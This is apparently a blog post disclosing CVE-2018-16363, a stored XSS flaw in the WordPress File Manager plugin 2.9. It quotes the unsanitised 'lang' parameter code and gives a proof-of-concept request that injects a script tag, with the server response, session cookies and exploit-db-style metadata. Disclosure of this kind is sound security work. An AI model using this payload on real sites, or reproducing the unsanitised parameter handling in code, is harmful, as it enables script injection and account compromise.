CVE-2018-16363 WordPress Plugin File Manager 2.9 – storage XSS

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363

file:file_folder_manager.php
code:set_transient( ‘wp_fm_lang’, $_GET[‘lang’] , 60 60 720 );

file:lib\wpfilemanager.php
code:var fmlang = ““;

poc:

request

[code]
GET /blog/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN<script>alert(1234567890)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: wordpress_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C71f1ed8075d5a34b82548bb0a92e6b6338ecf8fba0adc57da627d55f07693220; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C5fbc26f57a4eaf15c60c5840d5fa14f296e3bb1c66e567358d761a3963d1bb82; wp-settings-1=deleted; wp-settings-time-1=1535770900; PHPSESSID=501108188d8569138517f08ba9741c92
Connection: close
Upgrade-Insecure-Requests: 1
[/code]

response

[code]
HTTP/1.1 200 OK
Date: Sat, 01 Sep 2018 15:55:34 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47316



………”;var vle_nonce = “863ad12aa7”;………
[/code]

Exploit Title: WordPress Plugin File Manager 2.9 – storage type XSS
Exploit Author: ly55521
Google Dork: N/A
Type: XSS
Date: 2018-09-02
Vendor Homepage: N/A
Software Link: https://wordpress.org/plugins/wp-file-manager/
Affected Version: < 3.0
Tested on: Kali OS
CVE : CVE-2018-16363

Related links:

Update record: http://plugins.trac.wordpress.org/changeset/1936043
EXP: http://blog.51cto.com/010bjsoft/2171087
Loophole notification: https://wordpress.org/support/topic/security-concern-6/#post-10655739
safelink:https://wordpress.org/plugins/wp-file-manager/

《CVE-2018-16363 WordPress Plugin File Manager 2.9 – storage XSS》有1个想法

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.